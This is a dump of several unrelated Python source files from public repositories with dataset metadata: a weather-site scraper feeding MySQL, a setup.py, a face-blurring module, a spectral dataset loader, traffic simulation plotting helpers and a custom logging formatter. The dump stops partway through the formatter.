"doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "streamlit.set_page_config", "line_number": 6, "usage_type": "call"}, {"api_name": "streamlit.title", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 10, "usage_type": "call"}, {"api_name": "streamlit.columns", "line_number": 21, "usage_type": "call"}, {"api_name": 
"plotly.express.scatter", "line_number": 29, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 29, "usage_type": "name"}, {"api_name": "plotly.express.colors", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "33546437454", "text": "import requests\nimport xml.etree.ElementTree as ET\n\nfrom lxml import html\n\nimport pymysql\nfrom pymysql.cursors import DictCursor\n\nconnection = pymysql.connect(\n host='localhost',\n user='kommunar',\n password='123',\n db='price',\n charset='utf8mb4',\n cursorclass=DictCursor\n)\n\nparams = {'id':'ru', 'region':38}\nr = requests.get('http://www.pogodaiklimat.ru/archive.php', params=params)\nr.encoding = r.apparent_encoding\n\ntree = html.fromstring(r.text)\n\nlist = tree.xpath('//ul[@class = \"big-blue-billet__list\"]')[0].findall(\"li\")\nfor row in list:\n li = row.getchildren()[0]\n query = \"INSERT INTO price.city_id_weather(id, region, city) \" \\\n \"VALUES(%s,%s,%s)\"\n args = (li.attrib['href'], 'Иркутская область', li.text_content())\n cursor = connection.cursor()\n cursor.execute(query, args)\n connection.commit()\n\n", "repo_name": "Kommunarus/RosStat", "sub_path": "parsing/city.py", "file_name": "city.py", "file_ext": "py", "file_size_in_byte": 868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymysql.connect", "line_number": 9, "usage_type": "call"}, {"api_name": "pymysql.cursors.DictCursor", "line_number": 15, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 22, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 22, "usage_type": "name"}]} +{"seq_id": "12341431066", "text": "from setuptools import setup, find_packages\n\n\nrequires = [\n \"pyramid\",\n \"setuptools>=0.7\",\n \"deform>=2.0dev\",\n \"pyramid-deform\",\n \"pyramid-layout\",\n \"sqlalchemy\",\n \"zope.sqlalchemy\",\n \"rebecca.repository\",\n \"pyramid_mako\",\n \"webhelpers2>=2.0b5\",\n]\n\ntests_require = [\n \"testfixtures\",\n \"webtest\",\n]\n\nsetup(name=\"rebecca.app.admin\",\n namespace_packages=['rebecca', 'rebecca.app'],\n install_requires=requires,\n packages=find_packages(),\n tests_require=tests_require,\n extras_require={\n \"testing\": requires+tests_require,\n },\n)\n", "repo_name": "rebeccaframework/rebecca.app.admin", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "setuptools.setup", "line_number": 22, "usage_type": "call"}, {"api_name": "setuptools.find_packages", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "39829607706", "text": "\"\"\" This module implements the face blurring feature for the given human face in the given images\n\"\"\"\nfrom facexlib.parsing import init_parsing_model\nfrom facexlib.utils.misc import img2tensor\nfrom torchvision.transforms.functional import normalize\nfrom typing import Any\nfrom typing import Tuple\nfrom typing import List\nfrom typing import Union\n\nimport os\nimport cv2\nimport numpy as np\nimport torch\n\nvisual_debug = False\n\n\ndef get_face_parser_model(model_type: str = 'bisenet') -> Any:\n \"\"\"\n This function sets the model during the start and get the session for continuous inference in the later process\n\n :param model_type: Name of the model, i.e., face parsing model is bisenet by default, defaults 
to 'bisenet'\n :type model_type: str, optional\n :return: returns the model net for the given model type. It is usually Bisenet in this case\n :rtype: Any\n \"\"\"\n dev_acc = 'cuda' if torch.cuda.is_available() else 'cpu'\n net = init_parsing_model(model_name=model_type, device=dev_acc,\n model_rootpath=os.path.join(os.path.expanduser('~'), '.iveu'))\n\n return net, dev_acc\n\n\ndef enable_visual_debug_fb(enable: bool) -> None:\n \"\"\"\n This function invokes the visual debug information to be stored or not as image files.\n\n :param enable: It activates the visual debugging for testing purposes.\n :type enable: bool\n \"\"\"\n global visual_debug\n visual_debug = enable\n if (visual_debug is True):\n if not os.path.exists('debug'):\n os.makedirs('debug')\n\n\ndef overlay_blurred_face(base_img: Any, face_blur_img: Any, mask: Any) -> Any:\n \"\"\"\n It merges the background and the foreground based on the original, face blurred and mask image.\n\n :param base_img: This image is the original image to be processed\n :type base_img: Any\n :param face_blur_img: This is the blurred input image\n :type face_blur_img: Any\n :param mask: This image is the mask image that holds the face mask\n :type mask: Any\n :return: It returns the merged image\n :rtype: Any\n \"\"\"\n global visual_debug\n\n fg_img = cv2.bitwise_or(face_blur_img, face_blur_img, mask=mask)\n\n mask_inv = cv2.bitwise_not(mask)\n bg_img = cv2.bitwise_or(base_img, base_img, mask=mask_inv)\n\n overlaid_img = cv2.bitwise_or(fg_img, bg_img)\n\n if (visual_debug is True):\n cv2.imwrite(os.path.join('debug', 'd005_01_foreground_image_mask.png'), mask)\n cv2.imwrite(os.path.join('debug', 'd005_02_foreground_image.png'), fg_img)\n cv2.imwrite(os.path.join('debug', 'd005_03_background_image_mask.png'), mask_inv)\n cv2.imwrite(os.path.join('debug', 'd005_04_background_image.png'), bg_img)\n cv2.imwrite(os.path.join('debug', 'd005_05_output_resized.png'), overlaid_img)\n\n return overlaid_img\n\n\ndef add_face_blur(net: Any, dev_acc: str, in_file_path: str, out_file_path: str,\n blurring_factor: int = 33) -> None:\n \"\"\"\n This function adds the blur to the face using face mask by face parser and blurred input image\n\n :param net: This param holds the reference for the face parser net for inference\n :type net: Any\n :param dev_acc: It holds the cuda support if so for doing inference in the GPU, otherwise in CPU\n :type dev_acc: str\n :param in_file_path: The input file with path that has the face in that image\n :type in_file_path: str\n :param out_file_path: The output path with filename to store the processed face blurred image\n :type out_file_path: str\n :param blurring_factor: The kernel window size for the blurring filter, defaults to 33\n :type blurring_factor: int, optional\n :return: Returns the face blurred image in the original image resolution\n :rtype: Any\n \"\"\"\n global visual_debug\n\n img_org = cv2.imread(in_file_path)\n height, width = img_org.shape[:2]\n\n img_resized = cv2.resize(img_org, (512, 512), interpolation=cv2.INTER_LINEAR)\n img = img2tensor(img_resized.astype('float32') / 255., bgr2rgb=True, float32=True)\n normalize(img, (0.485, 0.456, 0.406), (0.229, 0.224, 0.225), inplace=True)\n\n if dev_acc == 'cuda':\n img = torch.unsqueeze(img, 0).cuda()\n elif dev_acc == 'cpu':\n img = torch.unsqueeze(img, 0)\n\n with torch.no_grad():\n face_parsed = net(img)[0]\n face_parsed = face_parsed.squeeze(0).cpu().numpy().argmax(0)\n\n mask_face = np.zeros((face_parsed.shape[0], face_parsed.shape[1]), dtype=\"uint8\")\n rep = 
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17]\n mask_face = np.where(np.isin(face_parsed, rep), 255, mask_face)\n\n ksize = (blurring_factor, blurring_factor)\n img_input_blur = cv2.blur(img_resized, ksize)\n\n overlaid_img = overlay_blurred_face(img_resized, img_input_blur, mask_face)\n\n final_img = cv2.resize(overlaid_img, (width, height), interpolation=cv2.INTER_LINEAR)\n\n if (visual_debug is True):\n cv2.imwrite(os.path.join('debug', 'd001_input_image.png'), img_org)\n cv2.imwrite(os.path.join('debug', 'd002_input_resized.png'), img_resized)\n cv2.imwrite(os.path.join('debug', 'd003_face_mask.png'), mask_face)\n cv2.imwrite(os.path.join('debug', 'd004_input_blurred.png'), img_input_blur)\n cv2.imwrite(os.path.join('debug', 'd006_final.png'), final_img)\n\n cv2.imwrite(out_file_path, final_img)\n", "repo_name": "makemypoc/image-video-editing-utils", "sub_path": "socialmediautils/blur/face_blur_img.py", "file_name": "face_blur_img.py", "file_ext": "py", "file_size_in_byte": 5307, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "torch.cuda.is_available", "line_number": 28, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 28, "usage_type": "attribute"}, {"api_name": "facexlib.parsing.init_parsing_model", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 30, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 19, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 49, "usage_type": "name"}, {"api_name": "cv2.bitwise_or", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.bitwise_not", "line_number": 66, "usage_type": "call"}, {"api_name": "cv2.bitwise_or", "line_number": 67, "usage_type": "call"}, {"api_name": "cv2.bitwise_or", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "typing.Any", "line_number": 81, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 101, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", 
"line_number": 104, "usage_type": "attribute"}, {"api_name": "facexlib.utils.misc.img2tensor", "line_number": 105, "usage_type": "call"}, {"api_name": "torchvision.transforms.functional.normalize", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.unsqueeze", "line_number": 111, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 117, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.isin", "line_number": 119, "usage_type": "call"}, {"api_name": "cv2.blur", "line_number": 122, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 126, "usage_type": "call"}, {"api_name": "cv2.INTER_LINEAR", "line_number": 126, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 129, "usage_type": "call"}, {"api_name": "os.path", "line_number": 129, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 135, "usage_type": "call"}]} +{"seq_id": "25329506963", "text": "import sys, os\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport pandas as pd\nimport numpy as np\nfrom scipy import signal\nfrom sklearn.decomposition import PCA\nfrom BaselineRemoval import BaselineRemoval\n\ndef noramlization(data):\n minVals = data.min(0)\n maxVals = data.max(0)\n ranges = maxVals - minVals\n normData = (data - minVals) / ranges\n return normData\n\ndef z_score(data):\n data -= np.mean(data, axis=0)\n data /= np.std(data, axis=0)\n return data\n\n\n# Savitzky-Golay for smoothing with general parameters\ndef SG(data, window_length, polyorder):\n return np.array([signal.savgol_filter(item, window_length, polyorder) for item in data])\n\nclass Datareader(Dataset):\n def __init__(self, filepath \n #,n_components=0.95 \n #,airpls_lambda=50, airpls_porder=1, airpls_itermax=30 \n #,sg_window_length=51, sg_polyorder=5\n ):\n dataframe = pd.read_csv(filepath)\n feature_data = dataframe.iloc[:, :-1].values\n \n # Applying z-score normalization\n feature_data = z_score(feature_data)\n \n # BaseLineRemoval\n\n # Applying BaseLineRemoval\n # feature_data : [n_samples, n_features]\n for i in range(feature_data.shape[1]):\n baseline = BaselineRemoval(feature_data[:, i])\n baseline = baseline.ZhangFit()\n feature_data[:, i] = baseline\n\n # Savitzky-Golay\n\n # Applying Savitzky-Golay smoothing filter with specified parameters\n # feature_data = SG(feature_data, sg_window_length, sg_polyorder)\n \n # Compute positional 
encoding\n d_model = feature_data.shape[1]\n sequence_length = feature_data.shape[0]\n wavelengths = dataframe.columns[:-1].astype(float).to_numpy()\n wavelength_diffs = np.diff(wavelengths, prepend=wavelengths[0])\n div_term = wavelength_diffs[np.newaxis, :] * -(np.log(10000.0) / d_model)\n position = np.arange(sequence_length)[:, np.newaxis]\n positional_encoding = np.zeros((sequence_length, d_model))\n positional_encoding[:, 0::2] = np.sin(position * div_term[:, 0::2])\n positional_encoding[:, 1::2] = np.cos(position * div_term[:, 1::2])\n\n feature = feature_data + positional_encoding\n\n # Applying PCA for dimensionality reduction if n_components is provided\n # if n_components is not None:\n # pca = PCA(n_components=n_components)\n # feature = pca.fit_transform(feature)\n\n self.data = feature\n \n self.labels = dataframe.iloc[:, -1].values\n \n def __len__(self):\n return len(self.data)\n \n def __getitem__(self, index):\n data_sample = torch.tensor(self.data[index], dtype=torch.float32)\n label = torch.tensor(self.labels[index], dtype=torch.long)\n return data_sample, label\n", "repo_name": "Eziotao-tyd/RSBC", "sub_path": "utils/datareader.py", "file_name": "datareader.py", "file_ext": "py", "file_size_in_byte": 2888, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.mean", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.signal.savgol_filter", "line_number": 25, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 27, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 33, "usage_type": "call"}, {"api_name": "BaselineRemoval.BaselineRemoval", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.cos", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.float32", "line_number": 79, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 80, "usage_type": "attribute"}]} +{"seq_id": "18225873253", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef estimate_flow(pos_grid,N,i,f):\n\n # estimates flow over time between position i and f in the road\n\n flow = []\n L = len(pos_grid[0])\n T = len(pos_grid)\n\n assert (i >= 0 and i <= L-1), \"i out of bound\"\n assert (f >= 0 and f <= L-1), \"f out of bound\"\n\n for row in pos_grid:\n\n temp_array = row[i:f]\n temp_flow = np.sum(temp_array)*(N/(L*T))\n flow.append(temp_flow)\n\n return flow\n\n\n\n\ndef plot_simulation(pos_grid):\n\n fig = plt.figure(figsize=(10,6))\n\n # we add some contrast to the velocity to the background of imshow\n\n for r,row in enumerate(pos_grid):\n for c,col in enumerate(row):\n 
pos_grid[r][c] += 1\n\n plt.xlabel('Occupation', fontsize = 13)\n plt.ylabel('Time', fontsize = 13)\n plt.title('Simulation')\n plt.legend()\n plt.imshow(pos_grid, cmap='inferno')\n\n return fig\n", "repo_name": "NonAbelianCapu/Traffic_Sim", "sub_path": "src/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.sum", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "39260600010", "text": "# -*- coding: utf8 -*-\n\nfrom __future__ import print_function\nimport logging\nimport re\nimport sys\nimport time\n\nfrom six import (\n binary_type,\n iteritems,\n string_types,\n)\n\n\n__DEBUG__ = False\n\nclass Formatter(logging.Formatter):\n \"\"\"\n Custom LogRecord formatter which handles string.format formatting and\n some custom keywords like '{color}'\n \"\"\"\n\n ENCODING = sys.getfilesystemencoding()\n FORMAT = '%(asctime)s [%(levelname)s][%(process)s]%(ident)s %(message)s'\n FORMAT_NO_DATE = '[%(levelname)s][%(process)s]%(ident)s %(message)s'\n DATEFMT = '%m/%d@%H:%M:%S'\n\n # assumes 256 colors\n # EXCLUDE_COLORS = [0, 256] + list(range(16, 22)) + listrange((232, 245))\n VALID_FG_COLORS = (\n list(range(1, 15+1))\n + list(range(22, 231+1))\n + list(range(245, 256+1))\n )\n _LEVEL_COLORS = {\n logging.DEBUG: (15, 8),\n logging.INFO: (15, None),\n logging.WARNING: (0, 202),\n logging.ERROR: (15, 1),\n logging.CRITICAL: (15, 201),\n }\n\n KEYWORD_REGEX_FMT = r'^\\w*{0}\\w*$'\n # |\\_/\\_/\\_/ \\\n # | | | | match entire string\n # | | | optionally match any trailing words\n # | \\ match keyword (eg. 
'color') optionally followed by\n # | optionally match any leading words\n # match entire string\n __REGEXES = {}\n\n __LARGE_TIME_UNITS = [\n ('d', 24*60*60),\n ('h', 60*60),\n ('m', 60),\n ('s', 1),\n ]\n __SMALL_TIME_UNITS =[\n ('ms', 1e-3),\n ('µs', 1e-6),\n ('ns', 1e-9),\n ('ps', 1e-12),\n ]\n __SIZE_UNITS = ['', 'K', 'M', 'G', 'T', 'P', 'E', 'Z']\n\n def __init__(self, fmt=FORMAT, datefmt=DATEFMT):\n logging.Formatter.__init__(self, fmt=fmt, datefmt=datefmt)\n\n def format(self, record):\n try:\n level_colors = self._LEVEL_COLORS[record.levelno]\n except KeyError:\n pass\n else:\n record.levelname = self.color_msg(\n # pad space to the end so that default level names align\n '{0:<{1}}'.format(record.levelname, len('CRITICAL')),\n level_colors[0],\n level_colors[1],\n )\n\n try:\n if record.process:\n record.process = self.get_fg_color_msg(record.process)\n except AttributeError:\n pass\n\n try:\n record.ident = self.get_fg_color_msg(record.ident)\n except AttributeError:\n record.ident = ''\n else:\n record.ident = ' ({0})'.format(record.ident)\n\n def handle_special_keyword(\n keyword, format_func, *func_args, **func_kwargs\n ):\n if keyword not in record.msg:\n # don't process the special keyword if it won't be formatted\n # in anyway\n return None\n\n regex = Formatter.__get_regex(keyword)\n # format all matching keywords in record.kwargs\n keys = [\n m.group(0) for k in record.kwargs.keys()\n for m in [regex.match(k)] if m\n ]\n for k in keys:\n record.kwargs[k] = format_func(\n record.kwargs[k], *func_args, **func_kwargs\n )\n return keys\n\n # Note: most of these keywords are mutually exclusive (unpack is baked\n # into time, size, color, strftime). This mutual exclusion is not\n # enforced, so nothing will break if multiple special keywords are\n # specified but the behavior is probably not what you will want\n # (whatever that may be).\n handle_special_keyword('unpack', self.unpack)\n handle_special_keyword('pprint', self.pprint)\n # XXX: send record.kwargs to strftime so it can try to get the passed-in\n # time instead of using the default current time\n handle_special_keyword('strftime', self.strftime, **record.kwargs)\n handle_special_keyword('time', self.readable_time)\n handle_special_keyword('size', self.readable_size)\n handle_special_keyword('yesno', self.yesno)\n # XXX: handle color last because it alters the text\n handle_special_keyword('color', self.get_fg_color_msg)\n\n # try to handle UnicodeEncodeError on string.format in py2.\n # (this is extraneous work in python3)\n encoded_args = []\n encoded_kwargs = {}\n for arg in record.args:\n encoded_args.append(Formatter.__stringify(arg))\n for key, val in iteritems(record.kwargs):\n encoded_kwargs[key] = Formatter.__stringify(val)\n\n msg = Formatter.__stringify(record.msg)\n try:\n record.msg = msg.format(*encoded_args, **encoded_kwargs)\n except (IndexError, KeyError, ValueError):\n # missing string.format arguments:\n # could be a typo or the msg could just contain '{}'\n # or mixing '{0} {}' formatting\n escaped_msg = Formatter.__handle_bad_msg(\n msg, record.args, record.kwargs,\n )\n try:\n record.msg = escaped_msg.format(*encoded_args, **encoded_kwargs)\n\n except Exception as e:\n import traceback\n # failed to catch some edge-case in __handle_bad_msg\n # (could be missing format_spec info eg. 
'{0:{}}')\n print(\n 'Could not format \\'{msg}\\''\n '\\nargs: {args}'\n '\\nkwargs: {kwargs}'.format(\n msg=escaped_msg,\n args=record.args,\n kwargs=record.kwargs,\n )\n )\n try:\n trace = traceback.format_exc()\n except KeyError as key_err:\n # failed get traceback ..\n print(\n 'Failed to print traceback ({type}: {err})'.format(\n type='.'.join([\n key_err.__module__,\n key_err.__class__.__name__,\n ]),\n err=key_err.message,\n )\n )\n else:\n print(trace)\n\n return ''\n\n # clear the args so that the base format() call doesn't complain about\n # missing arguments\n record.args = tuple() # TODO: pop only used arguments\n formatted_msg = logging.Formatter.format(self, record)\n\n return formatted_msg\n\n @staticmethod\n def __get_regex(keyword, ptn=KEYWORD_REGEX_FMT):\n try:\n regex = Formatter.__REGEXES[keyword]\n except KeyError:\n if ptn == Formatter.KEYWORD_REGEX_FMT:\n ptn = ptn.format(keyword)\n regex = re.compile(ptn)\n Formatter.__REGEXES[keyword] = regex\n return regex\n\n @staticmethod\n def __handle_bad_msg(msg, args, kwargs):\n \"\"\"\n Handles any missing args/keywords in the format message string\n \"\"\"\n try:\n str_formatter = Formatter.__STR_FORMATTER\n except AttributeError:\n import string\n str_formatter = string.Formatter()\n Formatter.__STR_FORMATTER = str_formatter\n\n def do_replace(field='', spec=''):\n if spec and not spec.startswith(':'):\n spec = ':' + spec\n ptn = ''.join([\n '(\\{',\n # escape in case '{}' appears in either\n # (eg. '>{1}' in regex means repeat '>' once)\n re.escape(str(field)),\n re.escape(str(spec)),\n '\\})'\n ])\n if __DEBUG__:\n print('enclosing:', ptn, 'with {}')\n return re.sub(ptn, r'{\\1}', msg)\n\n auto = []\n auto_children = []\n # map the order auto fields appear in case there are not enough args\n # (we cannot simply replace '{}' from the end in case of '{:{}}')\n auto_mapping = {}\n manual = []\n manual_children = []\n keyword_children = []\n def handle_field(field, format_spec='', parent=None):\n if field is not None:\n if not field:\n # {}\n data = None\n if not parent:\n auto.append( (field, format_spec) )\n data = (auto, len(auto)-1)\n else:\n auto_children.append( (field, format_spec) )\n data = (auto_children, len(auto_children)-1)\n auto_mapping[len(auto_mapping)] = data\n\n elif field.isdigit():\n # {69}\n # store all manual fields in case an auto field exists\n if not parent:\n manual.append( (int(field), format_spec) )\n else:\n manual_children.append( (int(field), format_spec) )\n\n elif field not in kwargs:\n # {foo}\n if not parent:\n # root-level field, just replace\n return do_replace(field, format_spec)\n else:\n # probably a format_spec or otherwise not at root-level\n # don't replace yet in case we need this field to format\n # a root-level field later\n keyword_children.append( (field, format_spec) )\n return msg\n\n # https://stackoverflow.com/a/37577590\n # https://hg.python.org/cpython/file/2.7/Lib/string.py#l634\n for text, field, format_spec, conversion in str_formatter.parse(msg):\n msg = handle_field(field, format_spec)\n\n # check if the format spec contains a format string\n # TODO: recursion required? 
I think it's theoretically possible\n # for an unbounded chain of format strings in format_specs but\n # why would someone do that ...?\n if isinstance(format_spec, string_types):\n for _, spec_field, _, _ in str_formatter.parse(format_spec):\n msg = handle_field(spec_field, parent=field)\n\n if __DEBUG__:\n print('->', msg, end='\\n\\n')\n\n num_auto = len(auto_mapping)\n num_manual = len(manual) + len(manual_children)\n if num_auto > 0 and num_manual > 0:\n # cannot mix '{}' and '{0}'\n for field, spec in auto:\n msg = do_replace(field, spec)\n for field, spec in manual:\n msg = do_replace(field, spec)\n # replace children after so that root-level replacements behave\n # properly\n # -- the underlying issue is if do_replace is called on the \"child\"\n # elements first, then the \"parent\" elements will not substitute\n # properly since the child was changed\n for field, spec in auto_children:\n msg = do_replace(field, spec)\n for field, spec in manual_children:\n msg = do_replace(field, spec)\n\n else:\n if num_auto > 0:\n # too many '{}' fields\n\n # XXX: this is not perfect; it doesn't handle eg. '{:{}}' well\n for i in reversed(sorted(auto_mapping.keys())):\n if len(args) <= i:\n _list, idx = auto_mapping[i]\n field, spec = _list[idx]\n msg = do_replace(field, spec)\n\n# def rreplace(old, new, num):\n# \"\"\"\n# replace last `num` occurrences of `old` with `new` in message\n\n# https://stackoverflow.com/a/2556252\n# \"\"\"\n# split = msg.rsplit(old, num)\n# return new.join(split)\n# msg = rreplace(r'{}', '{{}}', len(auto) - len(args))\n\n elif num_manual > 0:\n for field, spec in manual:\n if len(args) <= field:\n msg = do_replace(field, spec)\n for field, spec in manual_children:\n if len(args) <= field:\n msg = do_replace(field, spec)\n\n # format any missing \"child\" fields eg. 
'{bar}' in '{foo:{bar}}'\n for field, spec in keyword_children:\n msg = do_replace(field, spec)\n\n return msg\n\n @staticmethod\n def __encode(msg, encoding=ENCODING):\n if sys.version_info.major < 3:\n if isinstance(msg, unicode):\n return msg.encode(encoding, 'replace')\n return msg\n\n @staticmethod\n def __decode(msg, encoding=ENCODING):\n try:\n if isinstance(msg, binary_type):\n return msg.decode(encoding, 'replace')\n except AttributeError:\n pass\n return msg\n\n @staticmethod\n def __stringify(msg):\n if not isinstance(msg, string_types):\n msg = str(msg)\n else:\n msg = Formatter.__encode(msg)\n return msg\n\n @staticmethod\n def __choose_color(color_dict, msg, valid):\n \"\"\"\n Chooses a persistent color for the given msg\n \"\"\"\n import random\n msg = Formatter.__stringify(msg)\n try:\n msg_color = color_dict[msg][0]\n except KeyError:\n msg_color = random.choice(valid)\n finally:\n color_dict[msg] = (msg_color, time.time())\n\n # free up memory so that colorized strings that appear infrequently\n # aren't needlessly holding onto it\n num_pruned = 0\n EXPIRE_THRESHOLD = 3 * 60 * 60\n to_prune = [\n msg for msg in color_dict.keys()\n # elapsed > EXPIRE => hasn't been used in a while\n if time.time() - color_dict[msg][1] > EXPIRE_THRESHOLD\n ]\n for msg in to_prune:\n if __DEBUG__:\n print('Pruning colorized message: \\'{msg}\\' ...'.format(\n msg=msg\n ))\n del color_dict[msg]\n num_pruned += 1\n if __DEBUG__ and num_pruned > 0:\n print('Pruned #{num} colorized message{plural}'.format(\n num=num_pruned,\n plural=('' if num_pruned == 1 else 's'),\n ))\n\n return msg_color\n\n @staticmethod\n def color_fg(msg, valid=VALID_FG_COLORS):\n \"\"\"\n Chooses a color to use for the foreground\n \"\"\"\n try:\n fg_colors = Formatter.__colors_foreground\n except AttributeError:\n fg_colors = {}\n Formatter.__colors_foreground = fg_colors\n return Formatter.__choose_color(fg_colors, msg, valid)\n\n @staticmethod\n def color_bg(msg, valid=range(0, 256+1)):\n \"\"\"\n Chooses a color to use for the background\n \"\"\"\n try:\n bg_colors = Formatter.__colors_background\n except AttributeError:\n bg_colors = {}\n Formatter.__colors_background = bg_colors\n return Formatter.__choose_color(bg_colors, msg, valid)\n\n @staticmethod\n def color_msg(msg, fg, bg=None):\n \"\"\"\n Returns the color-formatted {msg} string\n \"\"\"\n full_msg = ['\\033[38;5;{0}'.format(fg)]\n if bg:\n full_msg.append(';48;5;{0}'.format(bg))\n full_msg.append('m{0}\\033[m'.format(Formatter.__stringify(msg)))\n return ''.join(full_msg)\n\n @staticmethod\n def get_fg_color_msg(msg):\n \"\"\"\n Chooses a foreground color for {msg} and returns the color-formatted\n string\n \"\"\"\n def get_color(msg):\n return Formatter.color_msg(msg, Formatter.color_fg(msg))\n\n return Formatter.unpack(msg, get_color)\n\n @staticmethod\n def unpack(seq, func=lambda e: e, *func_args, 